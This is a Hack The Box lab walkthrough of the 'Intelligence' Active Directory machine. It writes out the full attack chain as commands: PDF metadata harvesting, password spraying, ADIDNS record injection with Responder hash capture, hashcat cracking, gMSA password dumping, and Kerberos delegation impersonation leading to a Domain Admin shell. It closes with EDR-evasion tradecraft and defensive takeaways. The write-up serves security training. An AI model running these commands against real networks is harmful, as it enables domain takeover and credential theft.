Intelligence | Hack The Box Walkthrough | OSCP Style
In mature Active Directory environments, initial access is rarely achieved through a flashy zero-day vulnerability. More often, it stems…
In mature Active Directory environments, initial access is rarely achieved through a flashy zero-day vulnerability. More often, it stems from operational security failures: leaked metadata, predictable naming conventions, and hardcoded credentials. In this writeup, we will walk through the compromise of the Intelligence machine from Hack The Box. We will cover automated OSINT gathering, internal DNS hijacking via ADIDNS, exploiting
ReadGMSAPasswordrights, and finally, executing a Kerberos delegation attack to achieve Domain Admin.
Reconnaissance
As standard procedure, we begin by mapping the attack surface with a comprehensive TCP port scan against the target IP (10.10.10.248).
sudo nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.10.248 -oN result.txt

The scan reveals a typical Domain Controller footprint (DNS, Kerberos, SMB, LDAP) alongside a web server running on port 80.
Upon investigating the web server, we discover a directory hosting PDF documents. These files follow a strict and predictable naming convention: YYYY-MM-DD-upload.pdf. Recognizing this pattern, we can automate the discovery and exfiltration of all historical documents. We craft a Bash loop to generate all possible dates between 2020 and 2022, and pipeline it into wget for rapid, concurrent downloading:

for i in {2020..2022}; do for j in {01..12}; do for k in {01..31}; do echo "http://10.10.10.248/documents/$i-$j-$k-upload.pdf"; done; done; done | xargs -n 1 -P 20 wget

Metadata Extraction
Corporate documents often contain metadata that leaks internal network information. Using exiftool, we parse the downloaded PDFs and extract the Creator field, which conveniently contains the Active Directory usernames of the document authors.

We clean and deduplicate this output using grep, awk, and sort to generate a pristine list of valid domain users:
exiftool *.pdf | grep "Creator" | awk 'NF{print $NF}' | sort

Next, we need to inspect the contents of the PDFs. By utilizing pdftotext, we convert the documents into readable text files and grep through them:
for file in $(ls); do echo $file; done | grep -v users | while read filename; do pdftotext $filename; done
cat *.txt

Deep within one of the text files, we uncover a critical OPSEC failure: a leaked default corporate password string (NewIntelligenceCorpUser9876). We immediately use CrackMapExec to password-spray our generated user list against the SMB service:
crackmapexec smb 10.10.10.248 -u users.txt -p 'NewIntelligenceCorpUser9876'

We get a hit. We now have valid domain credentials for Tiffany.Molina.
Internal Enumeration
With initial access established, we map the domain environment using ldapdomaindump:
ldapdomaindump -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248


Enumerating SMB shares as Tiffany.Molina reveals access to the IT share, where we locate and download a PowerShell script named downdetector.ps1:
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r 'IT'
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --download 'IT/downdetector.ps1'


Analyzing downdetector.ps1 reveals a scheduled task configured to run every 5 minutes. The script performs a DNS lookup for hostnames starting with the word web and subsequently attempts to authenticate to them.
We can exploit this automated behavior by leveraging Active Directory Integrated DNS (ADIDNS). Any authenticated user can create a DNS record by default. We use dnstool.py to inject an A record (webcrypto) pointing to our attacker infrastructure:

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r webcrypto -a add -t A -d 10.10.14.6 10.10.10.248

We start Responder on our tun0 interface to capture the authentication attempt:
sudo python3 Responder.py -I tun0

Within minutes, the script attempts to connect to webcrypto, and Responder catches the NTLMv2 hash for the user TED.GRAVES. We easily crack this hash offline using Hashcat:
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

Credentials obtained: TED.GRAVES : Mr.Teddy
AD Privilege Escalation and gMSA Abuse
We validate our new access with CrackMapExec and pivot to mapping Active Directory permissions using BloodHound:
crackmapexec smb 10.10.10.248 -u 'TED.GRAVES' -p 'Mr.Teddy'
bloodhound-python -c all -u 'Ted.Graves' -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb


Analyzing the attack graphs in BloodHound, we discover that Ted.Graves (via his membership in the IT SUPPORT group) has ReadGMSAPassword rights over a Group Managed Service Account (gMSA).

Group Managed Service Accounts (gMSAs) are designed to provide automated password management, but if a user has the rights to read the password blob, they can extract the account’s credentials. We use gMSADumper.py to dump the NTLM hash of the svc_int account:

python3 gMSADumper.py -u 'TED.GRAVES' -p 'Mr.Teddy' -l 10.10.10.248 -d intelligence.htb

Hash obtained: svc_int$ : 5ecbb8825fa84b3154a7f12336795ed4
Domain Compromise
Further enumeration of domain objects using pywerview indicates that the svc_int$ account is highly privileged, specifically configured with Constrained Delegation rights over the Domain Controller:
pywerview get-netcomputer -u 'Ted.Graves' -p 'Mr.Teddy' -t 10.10.10.248 --full-data


Because svc_int$ is trusted for delegation, we can request a Kerberos Service Ticket (ST) impersonating any user (including the Domain Admin) to the target service. We use impacket-getST to perform this attack, impersonating the Administrator account for the WWW/dc.intelligence.htb SPN:
impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes ':5ecbb8825fa84b3154a7f12336795ed4'

With the forged Kerberos ticket saved as Administrator.ccache, we export it to our environment variables:
export KRB5CCNAME=Administrator.ccache

Finally, we authenticate to the Domain Controller via WMI using our forged ticket, granting us an interactive shell as the Domain Administrator:
impacket-wmiexec dc.intelligence.htb -k -no-pass

Conclusion
Intelligence is a brilliant machine that demonstrates how trivial misconfigurations can snowball into total domain compromise. The initial vector perfectly illustrates why robust document hygiene and metadata stripping are critical for modern enterprises.
From a Red Team perspective, while the Impacket suite and Python scripts used above are excellent for CTFs, executing them in a live, monitored environment is high-risk. To maintain OPSEC and evade advanced EDR telemetry:
- Avoid Dropping Heavy Binaries or Scripts: Instead of running Python tools directly on target systems or using noisy
.NETassemblies (execute-assembly), we must prioritize the use of Beacon Object Files (BOFs). BOFs execute directly within the memory space of our C2 beacon, significantly minimizing our footprint. - Ticket Extraction Tradecraft: When dealing with Kerberos tickets (like extracting the gMSA or performing delegation attacks), we should avoid interacting with the disk or triggering standard API alerts. We must extract tickets surgically by targeting specific LUIDs (Logon Session IDs) rather than querying by username, keeping our actions heavily stealthy.
- ADIDNS Poisoning Awareness: Defenders often miss ADIDNS hijacking because default permissions allow any authenticated user to create DNS records. Monitor for anomalous DNS record creations, especially those tied to automated scripts or infrastructure endpoints.
Key Takeaways:
- Sanitize Public Documents: Exiftool isn’t just for CTFs. Corporate documents regularly leak usernames, internal server names, and software versions.
- Audit gMSA Rights:
ReadGMSAPasswordis a powerful right. Ensure only necessary service accounts or tier-0 administrators have this capability. - Review Automated Scripts: Hardcoding credentials or broad network behaviors (like connecting to any host starting with
web) within PowerShell scripts is a major security risk. Use secure credential vaults and strict targeting.
If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.